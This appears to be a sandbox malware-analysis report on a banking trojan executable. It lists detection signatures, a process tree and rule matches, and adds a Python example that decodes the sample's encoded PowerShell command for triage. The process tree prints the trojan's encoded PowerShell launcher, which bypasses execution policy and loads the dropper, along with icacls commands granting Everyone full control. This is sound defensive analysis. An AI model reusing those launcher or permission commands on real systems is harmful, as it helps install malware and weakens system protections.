Windows Analysis Report
RcFBMph6zu.exe
Overview
General Information
Sample name: | RcFBMph6zu.exe (renamed because the original name is a hash value) |
Original sample name: | 7763f41947263d5b64cb49c2178292e26d6c10b033f530435726fa43340468ab.exe |
Analysis ID: | 1578840 |
MD5: | 6b5c558a9c8728fdd47e7d8c20cab5ff |
SHA1: | 2e3761639e85fe8143620d04f0f03e5b30207de4 |
SHA256: | 7763f41947263d5b64cb49c2178292e26d6c10b033f530435726fa43340468ab |
Tags: | banker, exe, latam, PAGAMENTOS-DIGITAIS-LTDA, trojan, user-johnk3r |
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Compliance
Score: | 48 |
Range: | 0 - 100 |
Signatures
Malicious encrypted Powershell command line found
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
.NET source code contains very large strings
AI detected suspicious sample
Bypasses PowerShell execution policy
Encrypted powershell cmdline option found
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Overwrites code with unconditional jumps - possibly setting hooks in a foreign process
PE file contains section with special chars
Powershell drops PE file
Powershell uses Background Intelligent Transfer Service (BITS)
Sigma detected: Potential Startup Shortcut Persistence Via PowerShell.EXE
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Switches to a custom stack to bypass stack traces
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Execution of Powershell with Base64
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- RcFBMph6zu.exe (PID: 3136 cmdline: "C:\Users\user\Desktop\RcFBMph6zu.exe" MD5: 6B5C558A9C8728FDD47E7D8C20CAB5FF)
- powershell.exe (PID: 7108 cmdline: "C:\Windows\system32\windowspowershell\v1.0\powershell.exe" -sta -noprofile -executionpolicy bypass -encodedcommand JAB4AD0AJwA1AGYAYgA2ADgAOQA1ADAALQA5AGEAYgBlAC0ANABhADkAMQAtADgAZABmADcALQA5ADIANQBjADQANAAxADgAMwBlAGUAMgAnADsAJAB5AD0AJwBDADoAXABVAHMAZQByAHMAXABlAG4AZwBpAG4AZQBlAHIAXABEAGUAcwBrAHQAbwBwAFwAUgBjAEYAQgBNAHAAaAA2AHoAdQAuAGUAeABlACcAOwB0AHIAeQAgAHsADQAKACAAIABpAGYAIAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFYAZQByAHMAaQBvAG4ALgBNAGEAagBvAHIAIAAtAGcAZQAgADQAKQANAAoAIAAgAHsAIAAkAG4AdQBsAGwAIAA9ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AFUAbgBzAGEAZgBlAEwAbwBhAGQARgByAG8AbQAoACQAeQApACAAfQAgAGUAbABzAGUAIAB7ACAAJABuAHUAbABsACAAPQAgAFsAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkAEYAaQBsAGUAKAAkAHkAKQB9AA0ACgAgACAALgAgACgAWwBfADMAMgAuAF8AOAA4AF0AOgA6AF8ANwA0ACgAJAB4ACkAKQANAAoAIAAgAGUAeABpAHQAIAAkAEwAQQBTAFQARQBYAEkAVABDAE8ARABFAA0ACgB9ACAADQAKAGMAYQB0AGMAaAAgAFsATgBvAHQAUwB1AHAAcABvAHIAdABlAGQARQB4AGMAZQBwAHQAaQBvAG4AXQANAAoAewANAAoAIAAgAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAnAEEAcABwAGwAaQBjAGEAdABpAG8AbgAgAGwAbwBjAGEAdABpAG8AbgAgAGkAcwAgAHUAbgB0AHIAdQBzAHQAZQBkAC4AIABDAG8AcAB5ACAAZgBpAGwAZQAgAHQAbwAgAGEAIABsAG8AYwBhAGwAIABkAHIAaQB2AGUALAAgAGEAbgBkACAAdAByAHkAIABhAGcAYQBpAG4ALgAnACAALQBGAG8AcgBlAGcAcgBvAHUAbgBkAEMAbwBsAG8AcgAgAFIAZQBkAA0ACgB9AA0ACgBjAGEAdABjAGgAIAB7AA0ACgAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACgAIgBFAHIAcgBvAHIAOgAgACIAIAArACAAJABfAC4ARQB4AGMAZQBwAHQAaQBvAG4ALgBNAGUAcwBzAGEAZwBlACkAIAAtAEYAbwByAGUAIABSAGUAZAAgAA0ACgB9AA== MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 3488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- icacls.exe (PID: 936 cmdline: "C:\Windows\system32\icacls.exe" C:\Nvidia-48001 /grant Everyone:F /T /C MD5: 48C87E3B3003A2413D6399EA77707F5D)
- WmiPrvSE.exe (PID: 6724 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
- icacls.exe (PID: 4776 cmdline: "C:\Windows\system32\icacls.exe" C:\Nvidia-48001\Nvidia-48001.exe /grant Everyone:F /T /C MD5: 48C87E3B3003A2413D6399EA77707F5D)
- Nvidia-48001.exe (PID: 4256 cmdline: "C:\Nvidia-48001\Nvidia-48001.exe" MD5: D11828146FF9E2E340C555F9531CAC47)
- svchost.exe (PID: 1364 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- Nvidia-48001.exe (PID: 2032 cmdline: "C:\Nvidia-48001\Nvidia-48001.exe" MD5: D11828146FF9E2E340C555F9531CAC47)
- cleanup
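The powershell.exe entry in the process tree above is what the "Suspicious Encoded PowerShell Command Line", "Bypasses PowerShell execution policy" and "Uses cacls to modify the permissions of files" signatures react to, and the first thing an analyst does with it is decode the -encodedcommand argument. The Python below is an added example, not part of the sandbox report or of the sample: it re-joins the base64 that the report renders in wrapped chunks, decodes it as UTF-16LE the way powershell.exe does, pulls out the GUID and file path the script references, and applies three cheap triage rules to the command lines. The sample command lines are copied from the tree; the function names, flag labels and rule thresholds are assumptions of this example.

```python
import base64
import re
from typing import Optional

# Constructed sample input: command lines copied from the process tree of this
# report, with the -encodedcommand base64 chunked the way the report renders it.
PS_CMDLINE = (
    '"C:\\Windows\\system32\\windowspowershell\\v1.0\\powershell.exe" '
    '-sta -noprofile -executionpolicy bypass -encodedcommand '
    'JAB4 AD0AJwA1AG YAYgA2ADgA OQA1ADAALQ A5AGEAYgBl AC0ANABhAD kAMQAtADgA '
    'ZABmADcALQ A5ADIANQBj ADQANAAxAD gAMwBlAGUA MgAnADsAJA B5AD0AJwBD ADoAXABVAH '
    'MAZQByAHMA XABlAG4AZw BpAG4AZQBl AHIAXABEAG UAcwBrAHQA bwBwAFwAUg BjAEYAQgBN '
    'AHAAaAA2AH oAdQAuAGUA eABlACcAOw B0AHIAeQAg AHsADQAKAC AAIABpAGYA IAAoAFsARQ '
    'BuAHYAaQBy AG8AbgBtAG UAbgB0AF0A OgA6AFYAZQ ByAHMAaQBv AG4ALgBNAG EAagBvAHIA '
    'IAAtAGcAZQ AgADQAKQAN AAoAIAAgAH sAIAAkAG4A dQBsAGwAIA A9ACAAWwBS AGUAZgBsAG '
    'UAYwB0AGkA bwBuAC4AQQ BzAHMAZQBt AGIAbAB5AF 0AOgA6AFUA bgBzAGEAZg BlAEwAbwBh '
    'AGQARgByAG 8AbQAoACQA eQApACAAfQ AgAGUAbABz AGUAIAB7AC AAJABuAHUA bABsACAAPQ '
    'AgAFsAUgBl AGYAbABlAG MAdABpAG8A bgAuAEEAcw BzAGUAbQBi AGwAeQBdAD oAOgBMAG8A '
    'YQBkAEYAaQ BsAGUAKAAk AHkAKQB9AA 0ACgAgACAA LgAgACgAWw BfADMAMgAu AF8AOAA4AF '
    '0AOgA6AF8A NwA0ACgAJA B4ACkAKQAN AAoAIAAgAG UAeABpAHQA IAAkAEwAQQ BTAFQARQBY '
    'AEkAVABDAE 8ARABFAA0A CgB9ACAADQ AKAGMAYQB0 AGMAaAAgAF sATgBvAHQA UwB1AHAAcA '
    'BvAHIAdABl AGQARQB4AG MAZQBwAHQA aQBvAG4AXQ ANAAoAewAN AAoAIAAgAF cAcgBpAHQA '
    'ZQAtAEgAbw BzAHQAIAAn AEEAcABwAG wAaQBjAGEA dABpAG8Abg AgAGwAbwBj AGEAdABpAG '
    '8AbgAgAGkA cwAgAHUAbg B0AHIAdQBz AHQAZQBkAC 4AIABDAG8A cAB5ACAAZg BpAGwAZQAg '
    'AHQAbwAgAG EAIABsAG8A YwBhAGwAIA BkAHIAaQB2 AGUALAAgAG EAbgBkACAA dAByAHkAIA '
    'BhAGcAYQBp AG4ALgAnAC AALQBGAG8A cgBlAGcAcg BvAHUAbgBk AEMAbwBsAG 8AcgAgAFIA '
    'ZQBkAA0ACg B9AA0ACgBj AGEAdABjAG gAIAB7AA0A CgAgACAAVw ByAGkAdABl AC0ASABvAH '
    'MAdAAgACgA IgBFAHIAcg BvAHIAOgAg ACIAIAArAC AAJABfAC4A RQB4AGMAZQ BwAHQAaQBv '
    'AG4ALgBNAG UAcwBzAGEA ZwBlACkAIA AtAEYAbwBy AGUAIABSAG UAZAAgAA0A CgB9AA== '
    'MD5: 04029E121A0CFA5991749937DD22A1D9'
)
ICACLS_CMDLINE = '"C:\\Windows\\system32\\icacls.exe" C:\\Nvidia-48001 /grant Everyone:F /T /C'
B64_CHUNK = re.compile(r"^[A-Za-z0-9+/=]+$")
GUID_RE = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}", re.I)
WIN_PATH_RE = re.compile(r"'([A-Za-z]:\\[^']+)'")

def _tokens(cmdline):
    return re.findall(r'"[^"]*"|\S+', cmdline)  # quoted paths stay whole

def _is_switch(tok, full, min_len=1):
    # powershell.exe accepts any unambiguous prefix of a switch (-e, -ec, -enc, ...).
    name = tok[1:].lower()
    return tok[:1] in ("-", "/") and len(name) >= min_len and full.startswith(name)

def extract_encoded_command(cmdline) -> Optional[str]:
    """Base64 after -EncodedCommand (any accepted prefix), re-joined across the
    whitespace a report inserts when wrapping long arguments; None if absent."""
    toks = _tokens(cmdline)
    for i, tok in enumerate(toks):
        if _is_switch(tok, "encodedcommand"):
            chunks = []
            for nxt in toks[i + 1:]:
                if not B64_CHUNK.match(nxt):
                    break  # e.g. the report's trailing 'MD5:' column
                chunks.append(nxt)
            return "".join(chunks) or None
    return None

def decode_encoded_command(cmdline) -> str:
    b64 = extract_encoded_command(cmdline)
    if b64 is None:
        raise ValueError("no -EncodedCommand switch in command line")
    return base64.b64decode(b64, validate=True).decode("utf-16-le")  # UTF-16LE, not UTF-8

def flags_for(cmdline) -> set:
    """Cheap triage of one command line, in the spirit of the execution-policy,
    encoded-command and cacls signatures listed in this report."""
    toks = _tokens(cmdline)
    low = [t.lower().strip('"') for t in toks]
    image = low[0].rsplit("\\", 1)[-1]
    flags = set()
    if image == "powershell.exe":
        if extract_encoded_command(cmdline):
            flags.add("ps_encoded_command")
        for i, tok in enumerate(toks[:-1]):
            if ((_is_switch(tok, "executionpolicy", 2) or low[i] == "-ep")
                    and low[i + 1] in ("bypass", "unrestricted")):
                flags.add("ps_executionpolicy_bypass")
    if (image in ("icacls.exe", "cacls.exe") and "/grant" in low
            and any(t.startswith("everyone:") for t in low)):
        flags.add("acl_grant_everyone")
    return flags

def summarize(cmdline) -> dict:
    """Indicators an analyst wants from the decoded script."""
    script = decode_encoded_command(cmdline)
    return {
        "guids": GUID_RE.findall(script),
        "paths": WIN_PATH_RE.findall(script),
        "loads_assembly": "[Reflection.Assembly]::" in script,
        "dot_sources": re.search(r"^\s*\.\s*\(", script, re.M) is not None,
    }

if __name__ == "__main__":
    print(decode_encoded_command(PS_CMDLINE))
    print(summarize(PS_CMDLINE), sorted(flags_for(PS_CMDLINE)), sorted(flags_for(ICACLS_CMDLINE)))
```

Run as-is, it prints the decoded script. It sets `$x` to a GUID and `$y` to a hard-coded path to the dropper, loads that file as a .NET assembly with `[Reflection.Assembly]::UnsafeLoadFrom` (falling back to `LoadFile` when the CLR major version is below 4), dot-sources the string returned by `[_32._88]::_74($x)`, and exits with `$LASTEXITCODE`; the catch blocks only print an error. That is the "unpacking or dynamic code loading" the signature list refers to: the real PowerShell payload lives inside the EXE's .NET code (consistent with ".NET source code contains very large strings"), not in the command line, so decoding the command line tells you where to look next rather than what the payload does. Note also that the path baked into the script (`C:\Users\engineer\Desktop\RcFBMph6zu.exe`) is not the path the sample ran from in this analysis (`C:\Users\user\Desktop`); the decoded text is the only place that second path appears in the report.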
No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
| INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen | |

Source | Rule | Description | Author | Strings |
---|---|---|---|---|
| INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen | |
System Summary
Source: | Author: Christopher Peacock '@securepeacock', SCYTHE
Source: | Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community